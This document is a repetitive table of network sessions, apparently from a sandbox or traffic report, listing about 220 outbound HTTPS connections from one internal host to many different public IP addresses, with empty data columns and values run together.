                                                15263192.168.2.235618443.232.217.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15264192.168.2.2351640108.185.69.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15265192.168.2.2349586216.186.73.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15266192.168.2.2337036110.175.68.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15267192.168.2.235008252.213.236.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15268192.168.2.236002075.53.248.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15269192.168.2.2353862165.127.147.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15270192.168.2.2360590118.120.9.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15271192.168.2.233531458.247.104.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15272192.168.2.2355188190.64.70.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15273192.168.2.236039844.138.115.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15274192.168.2.2341448187.148.32.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15275192.168.2.2344996156.232.185.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15276192.168.2.2334338196.184.121.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15277192.168.2.2342020220.214.254.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15278192.168.2.235712067.137.193.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15279192.168.2.2337400143.107.146.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15280192.168.2.233518665.43.57.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15281192.168.2.234643097.201.35.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15282192.168.2.2346482207.77.208.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15283192.168.2.2341806195.41.205.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15284192.168.2.2341970124.150.17.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15285192.168.2.2338774211.207.124.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15286192.168.2.2356556208.31.183.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15287192.168.2.235347690.12.108.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15288192.168.2.234547824.255.101.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15289192.168.2.2356614204.218.236.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15290192.168.2.2359486105.246.205.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15291192.168.2.2335680162.35.194.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15292192.168.2.235406291.45.69.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15293192.168.2.234838031.249.191.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15294192.168.2.2355356102.247.34.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15295192.168.2.2358320141.187.245.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15296192.168.2.2338536163.212.218.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15297192.168.2.235057864.209.206.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15298192.168.2.2357034187.227.87.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15299192.168.2.233580474.195.183.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15300192.168.2.234074654.104.14.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15301192.168.2.234092820.67.96.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15302192.168.2.2338768217.126.148.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15303192.168.2.2339860222.27.153.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15304192.168.2.23432805.86.44.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15305192.168.2.2350678211.47.50.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15306192.168.2.235155873.253.167.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15307192.168.2.235702873.118.181.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15308192.168.2.2344450212.54.166.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15309192.168.2.2352520142.72.40.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15310192.168.2.2336732189.210.140.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15311192.168.2.2355448156.187.16.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15312192.168.2.2348226167.194.83.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15313192.168.2.2332950100.197.176.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15314192.168.2.2357968176.130.147.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15315192.168.2.2359950208.185.152.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15316192.168.2.2339806146.156.186.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15317192.168.2.234477243.227.88.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15318192.168.2.235036480.101.131.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15319192.168.2.2335664166.182.216.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15320192.168.2.2334028210.30.244.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15321192.168.2.2341158100.46.51.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15322192.168.2.2357610105.189.204.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15323192.168.2.23577682.60.192.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15324192.168.2.233653271.136.255.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15325192.168.2.2340462152.186.151.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15326192.168.2.234704863.227.227.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15327192.168.2.234969882.52.152.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15328192.168.2.2343374202.180.16.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15329192.168.2.2347710110.109.187.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15330192.168.2.235540612.44.57.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15331192.168.2.2351900165.8.37.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15332192.168.2.234965654.161.152.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15333192.168.2.2351482178.175.226.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15334192.168.2.2359608206.14.228.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15335192.168.2.2354638140.173.71.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15336192.168.2.235613484.232.64.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15337192.168.2.2351630186.218.81.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15338192.168.2.233537063.25.237.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15339192.168.2.234664443.180.146.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15340192.168.2.235561867.177.196.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15341192.168.2.235935852.109.71.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15342192.168.2.2337052137.175.68.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15343192.168.2.2350710150.189.141.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15344192.168.2.2333854119.85.54.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15345192.168.2.2342650156.102.239.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15346192.168.2.234017272.192.150.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15347192.168.2.2347474162.212.211.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15348192.168.2.2344138207.251.199.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15349192.168.2.2334086159.202.220.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15350192.168.2.2339830209.210.145.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15351192.168.2.233711659.58.22.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15352192.168.2.2335914166.239.218.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15353192.168.2.234813864.183.180.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15354192.168.2.2345626110.113.203.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15355192.168.2.234595827.154.248.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15356192.168.2.2358850171.45.60.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15357192.168.2.2348858130.61.145.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15358192.168.2.235118698.200.140.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15359192.168.2.233288014.148.47.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15360192.168.2.2358568111.18.191.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15361192.168.2.2346980148.124.104.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15362192.168.2.235353093.51.163.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15363192.168.2.2359802150.205.112.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15364192.168.2.2340898207.231.169.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15365192.168.2.233477846.251.67.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15366192.168.2.233580223.74.94.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15367192.168.2.2334788213.88.90.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15368192.168.2.2343078190.190.48.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15369192.168.2.234276643.85.51.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15370192.168.2.2340560190.117.50.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15371192.168.2.2341306188.3.23.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15372192.168.2.235892075.215.190.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15373192.168.2.2334392191.213.87.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15374192.168.2.23384288.226.52.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15375192.168.2.234646838.133.214.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15376192.168.2.2352448111.220.189.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15377192.168.2.2333958211.104.203.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15378192.168.2.2357392168.178.241.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15379192.168.2.235474238.195.130.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15380192.168.2.233679665.23.80.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15381192.168.2.2341134202.61.71.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15382192.168.2.234834893.248.36.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15383192.168.2.233891087.190.153.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15384192.168.2.2341954119.107.72.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15385192.168.2.2335262110.159.25.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15386192.168.2.235542867.153.172.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15387192.168.2.235909863.144.41.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15388192.168.2.236010894.233.5.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15389192.168.2.234862014.72.147.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15390192.168.2.2359900216.117.89.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15391192.168.2.235015296.27.62.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15392192.168.2.234987892.177.147.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15393192.168.2.2360624171.129.96.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15394192.168.2.2333452149.238.69.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15395192.168.2.2347846195.104.77.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15396192.168.2.233544481.4.23.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15397192.168.2.2355210139.11.136.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15398192.168.2.2333836188.152.161.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15399192.168.2.235250089.2.49.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15400192.168.2.2348584101.168.201.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15401192.168.2.234712088.68.112.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15402192.168.2.235438461.31.193.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15403192.168.2.235597084.215.95.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15404192.168.2.2340364135.29.115.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15405192.168.2.234222053.40.185.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15406192.168.2.2340652193.151.206.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15407192.168.2.234342436.3.7.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15408192.168.2.234133242.152.212.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15409192.168.2.233376693.152.247.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15410192.168.2.233926886.198.206.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15411192.168.2.2343602218.111.231.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15412192.168.2.2348882110.161.4.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15413192.168.2.2357176181.200.9.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15414192.168.2.2358438199.11.51.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15415192.168.2.2338930126.186.82.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15416192.168.2.2356666161.60.102.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15417192.168.2.2334196161.207.107.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15418192.168.2.233345625.173.148.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15419192.168.2.234441842.190.144.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15420192.168.2.2354044181.143.93.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15421192.168.2.2357208133.100.86.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15422192.168.2.2359606161.140.34.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15423192.168.2.235756238.11.27.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15424192.168.2.235561257.102.236.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15425192.168.2.2360416163.167.248.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15426192.168.2.235819438.43.39.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15427192.168.2.235637684.151.245.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15428192.168.2.234625489.17.82.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15429192.168.2.2359768209.17.159.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15430192.168.2.2342144191.63.126.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15431192.168.2.2343956171.212.7.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15432192.168.2.2341244153.66.196.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15433192.168.2.2347662105.150.168.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15434192.168.2.2341936158.127.200.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15435192.168.2.234092614.62.154.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15436192.168.2.234676889.95.219.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15437192.168.2.2348608170.236.8.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15438192.168.2.2341180118.226.245.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15439192.168.2.233925436.190.190.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15440192.168.2.2334910200.137.155.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15441192.168.2.2342740196.6.152.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15442192.168.2.234570834.56.47.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15443192.168.2.2341186173.44.243.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15444192.168.2.2342794204.86.255.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15445192.168.2.2336770168.176.24.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15446192.168.2.2347954195.58.29.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15447192.168.2.2341180206.140.237.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15448192.168.2.235884899.83.199.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15449192.168.2.235381064.150.202.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15450192.168.2.234731614.141.100.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15451192.168.2.235261883.7.44.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15452192.168.2.2339606114.154.175.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15453192.168.2.2351340110.54.72.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15454192.168.2.234526258.188.221.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15455192.168.2.2347096201.228.218.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15456192.168.2.2345586154.13.165.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15457192.168.2.2348258212.1.11.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15458192.168.2.235337619.239.58.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15459192.168.2.233899242.94.96.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15460192.168.2.2336908220.220.178.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15461192.168.2.2339750105.32.227.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15462192.168.2.234523837.245.106.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15463192.168.2.2349088180.108.23.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15464192.168.2.234075296.201.254.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15465192.168.2.2359668152.45.210.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15466192.168.2.2359084217.123.132.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15467192.168.2.2344338195.89.113.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15468192.168.2.234093064.33.199.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15469192.168.2.2335298146.209.151.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15470192.168.2.234109090.64.27.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15471192.168.2.2333132131.92.141.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15472192.168.2.235103449.254.253.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15473192.168.2.233456290.42.37.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15474192.168.2.2360594131.221.23.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15475192.168.2.2358596195.239.218.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15476192.168.2.234973276.247.40.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15477192.168.2.235751438.174.113.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15478192.168.2.2351658165.51.65.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15479192.168.2.2340548130.66.123.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15480192.168.2.2345766218.144.184.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15481192.168.2.2334410157.55.145.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15482192.168.2.2336612185.17.18.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15483192.168.2.2339654110.157.161.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15484192.168.2.234823894.65.236.203443
                                                TimestampBytes transferredDirectionData


